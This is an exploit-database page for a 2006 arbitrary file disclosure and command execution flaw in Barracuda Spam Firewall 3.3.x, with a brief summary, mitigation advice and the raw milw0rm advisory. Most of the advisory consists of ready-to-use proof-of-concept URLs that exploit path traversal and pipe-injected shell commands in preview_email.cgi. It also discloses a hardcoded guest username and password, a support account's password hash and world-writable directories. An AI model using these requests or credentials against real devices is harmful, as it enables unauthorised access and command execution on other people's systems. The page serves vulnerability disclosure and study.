header-logo
Suggest Exploit
vendor:
Barracuda Spam Firewall
by:
Greg Sinclair
N/A
CVSS
HIGH
Arbitrary File Disclosure + Command Execution
20
CWE
Product Name: Barracuda Spam Firewall
Affected Version From: 3.3.01.001
Affected Version To: 3.3.03.053
Patch Exists: NO
Related CWE: N/A
CPE: a:barracuda_networks:barracuda_spam_firewall
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Barracuda Arbitrary File Disclosure + Command Execution

The Barracuda Spam Firewall version 3.3.01.001 to 3.3.03.053 is affected by an arbitrary file disclosure and command execution vulnerability. An attacker can exploit this vulnerability to disclose sensitive information and execute arbitrary commands on the affected device.

Mitigation:

Apply the necessary security patches provided by Barracuda Networks. Upgrade to a non-vulnerable version of the Barracuda Spam Firewall.
Source

Exploit-DB raw data:

Title: Barracuda Arbitrary File Disclosure + Command Execution
Severity: High (Sensitive Information Disclosure)
Date: 01 August 2006
Version Affected: Barracuda Spam Firewall version 3.3.01.001 to 3.3.03.053
Discovered by: Greg Sinclair
Credits: Matthew Hall
Update: 07 August 2006
Updated by: PATz
 
####################################################################
 
Proof of Concept:
https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/../tmp/backup/periodic_config.txt.tmp
https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/ls%20/|
 
 
####################################################################
 
#using |unix| for command execution:
 
https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/|uname%20-a|

#admin login/pass vuln
 
https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog|cat%20update_admin_passwd.pl|
https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/../bin/update_admin_passwd.pl
 
eg.

#`/home/emailswitch/code/firmware/current/bin/updateUser.pl guest phteam99 2>&1`;
login: guest pass: phteam99

some folder are accessible via http without permission
https://<deviceIP>/Translators/
https://<deviceIP>/images/
https://<deviceIP>/locale
https://<deviceIP>/plugins
https://<deviceIP>/help
 
#stuff in do_install
 
/usr/sbin/useradd support -s /home/emailswitch/code/firmware/current/bin/request_support.pl -p swUpHFjf1MUiM
 
## Create backup tmp dir

/bin/mkdir -p /mail/tmp/backup/
chmod -R 777 /mail/tmp/
 
## Create smb backup mount point
/bin/mkdir -p /mnt/smb/
chmod 777 /mnt/smb/
 
.................................
Greetz to all noypi and phteam ^^,
.............eof.................

# milw0rm.com [2006-08-08]

Navigation

Suggest Exploit

Services By CQR